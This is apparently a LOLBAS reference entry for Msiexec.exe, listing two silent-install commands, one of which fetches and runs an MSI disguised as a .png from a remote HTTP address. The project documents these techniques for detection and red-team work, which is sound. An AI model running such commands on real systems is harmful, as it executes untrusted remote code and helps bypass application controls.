LOLBAS/OSBinaries/Msiexec.md

11 lines
161 B
Markdown
Raw Normal View History

2018-04-18 13:41:44 +00:00
## Msiexec.exe
* Functions: Execute
```
msiexec /quiet /i cmd.msi
msiexec /q /i http://192.168.100.3/tmp/cmd.png
```
Acknowledgements:
* Casey Smith - @subtee